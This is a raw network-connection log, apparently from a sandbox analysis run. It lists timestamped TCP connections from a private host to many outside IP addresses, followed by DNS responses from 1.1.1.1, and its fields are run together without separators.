                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685728073 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685741901 CEST44355363188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685751915 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685758114 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:32.685792923 CEST55363443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 08:59:47.059973001 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:47.060040951 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.959929943 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.960167885 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.960167885 CEST553628001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.962636948 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.965030909 CEST80015536247.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:51.967492104 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:59:52.350522995 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.267832041 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448872089 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.448934078 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763622046 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763688087 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.763802052 CEST5151780192.168.2.472.52.179.174
                                                                                                                                                                                                            Sep 8, 2024 09:00:00.768584967 CEST805151772.52.179.174192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.164859056 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.164941072 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.530431032 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535259962 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535481930 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.535590887 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:02.540580988 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.162983894 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163038015 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163048983 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163069010 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.163115025 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164383888 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164449930 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164519072 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164828062 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164886951 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.164935112 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165016890 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165107965 CEST805151364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.165167093 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.166635036 CEST5151380192.168.2.464.190.63.136
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.171919107 CEST5151880192.168.2.452.34.198.229
                                                                                                                                                                                                            Sep 8, 2024 09:00:04.176911116 CEST805151852.34.198.229192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.689388037 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694294930 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694354057 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.694504976 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:07.699639082 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190821886 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190855026 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190888882 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.190933943 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.197607994 CEST5193680192.168.2.444.221.84.105
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.202339888 CEST805193644.221.84.105192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.405204058 CEST8051514199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:08.405282021 CEST5151480192.168.2.4199.59.243.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.873377085 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878151894 CEST8061260199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878226042 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.878705025 CEST6126080192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.883493900 CEST8061260199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910095930 CEST5532080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.910410881 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.914943933 CEST80553203.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915203094 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915282011 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.915395021 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:10.920135975 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.122426033 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127327919 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127412081 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.127598047 CEST5404280192.168.2.469.162.80.62
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.128834963 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129108906 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129498959 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129700899 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.129861116 CEST5533080192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.130038023 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133497953 CEST805404269.162.80.62192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133923054 CEST8049732188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.133991003 CEST8054043188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134002924 CEST4973280192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134174109 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134511948 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134562969 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134691954 CEST8049733208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134742975 CEST4973380192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134757042 CEST80553303.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134788990 CEST80540453.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.134843111 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.136521101 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.141314983 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.142378092 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.142412901 CEST5404680192.168.2.423.253.46.64
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.147404909 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205440998 CEST5404380192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205537081 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205620050 CEST5404580192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205734015 CEST5532980192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.205997944 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210264921 CEST8054043188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210372925 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210607052 CEST80540453.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210618973 CEST8055329154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210727930 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.210803986 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.215039015 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.219912052 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.243084908 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248399973 CEST8054048178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248462915 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.248603106 CEST5404880192.168.2.4178.162.203.226
                                                                                                                                                                                                            Sep 8, 2024 09:00:11.254453897 CEST8054048178.162.203.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599822044 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:12.599864006 CEST805404623.253.46.64192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:14.987425089 CEST5405380192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:14.992135048 CEST80540533.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.044650078 CEST5405480192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.049603939 CEST8054054199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.049818993 CEST5405480192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.050230026 CEST5405480192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:15.054956913 CEST8054054199.191.50.83192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:18.602668047 CEST80540533.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:18.602751017 CEST5405380192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:18.989970922 CEST5405480192.168.2.4199.191.50.83
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.081974030 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.082503080 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.087014914 CEST8055356188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.087299109 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.087399006 CEST5535680192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.087418079 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.088488102 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.093242884 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.263128996 CEST5535980192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.267916918 CEST8055359103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.311218977 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.316061974 CEST8054056103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.316262007 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.316461086 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:19.321181059 CEST8054056103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.346888065 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.346941948 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.355989933 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.356036901 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.356096029 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.356379986 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.356391907 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.656668901 CEST8054056103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.656732082 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.658970118 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.659259081 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664079905 CEST80015537847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664092064 CEST80015405847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664154053 CEST553788001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664175034 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.664362907 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.669101954 CEST80015405847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.822007895 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.822084904 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.822535038 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.822556019 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.824424028 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:20.824438095 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.690274000 CEST80015405847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.690349102 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.692056894 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:21.696917057 CEST8054056103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044274092 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044328928 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044358015 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044384003 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044399977 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044435024 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044456959 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044471979 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044495106 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044507027 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044529915 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044548035 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044557095 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044565916 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044589996 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044615030 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044620037 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.044662952 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.045272112 CEST44354057188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.045314074 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.045574903 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.045594931 CEST54057443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.047838926 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.052592039 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.196717024 CEST8054056103.150.11.230192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.196782112 CEST5405680192.168.2.4103.150.11.230
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.197593927 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.206602097 CEST80015405847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.419481039 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.419538975 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.514379025 CEST8054055188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.514471054 CEST5405580192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.536585093 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.536643982 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.536953926 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.537926912 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.537938118 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.573787928 CEST80015405847.103.150.18192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:22.573865891 CEST540588001192.168.2.447.103.150.18
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.004607916 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.004689932 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.006439924 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.006450891 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.006707907 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.006752014 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.007231951 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:23.052490950 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.051007986 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.051055908 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.051078081 CEST54059443192.168.2.4188.114.96.3
                                                                                                                                                                                                            Sep 8, 2024 09:00:25.051090002 CEST44354059188.114.96.3192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963076115 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963134050 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.963274956 CEST5535780192.168.2.413.248.169.48
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.971204996 CEST805406364.190.63.136192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973545074 CEST805151664.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973562002 CEST805150915.197.240.20192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973572016 CEST805150764.225.91.73192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973583937 CEST805535713.248.169.48192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973612070 CEST5151680192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973676920 CEST5150980192.168.2.415.197.240.20
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973706007 CEST5150780192.168.2.464.225.91.73
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.973711014 CEST5535780192.168.2.413.248.169.48
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.975107908 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.975174904 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.980622053 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981441975 CEST8054047154.212.231.82192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981503963 CEST5404780192.168.2.4154.212.231.82
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981523037 CEST80612613.64.163.50192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.981601000 CEST6126180192.168.2.43.64.163.50
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.987040043 CEST8054044208.100.26.245192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:33.987107992 CEST5404480192.168.2.4208.100.26.245
                                                                                                                                                                                                            Sep 8, 2024 09:00:36.337066889 CEST8054064199.59.243.226192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 09:00:36.337151051 CEST5406480192.168.2.4199.59.243.226
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075433969 CEST53640481.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075716019 CEST53553621.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075725079 CEST53519151.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075733900 CEST53631181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075855017 CEST53646601.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075865030 CEST53538581.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.075875044 CEST53585321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076025009 CEST53523081.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076045036 CEST53584831.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076144934 CEST53517401.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076153994 CEST53502101.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076169968 CEST53621591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.076181889 CEST53536181.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078053951 CEST53606871.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078063965 CEST53616041.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.078073978 CEST53607921.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.079549074 CEST53515731.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081099987 CEST53630821.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081832886 CEST53594231.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.081970930 CEST53566671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082115889 CEST53593941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082124949 CEST53593941.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082343102 CEST53494501.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.082353115 CEST53614801.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083270073 CEST53631711.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083645105 CEST53560321.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.083653927 CEST53634671.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.084590912 CEST53539771.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.091716051 CEST53593591.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092248917 CEST53636021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092328072 CEST53636021.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092456102 CEST53638421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.092516899 CEST53638421.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.095597982 CEST53538651.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.095750093 CEST53499851.1.1.1192.168.2.4
                                                                                                                                                                                                            Sep 8, 2024 08:58:45.096220016 CEST53636951.1.1.1192.168.2.4
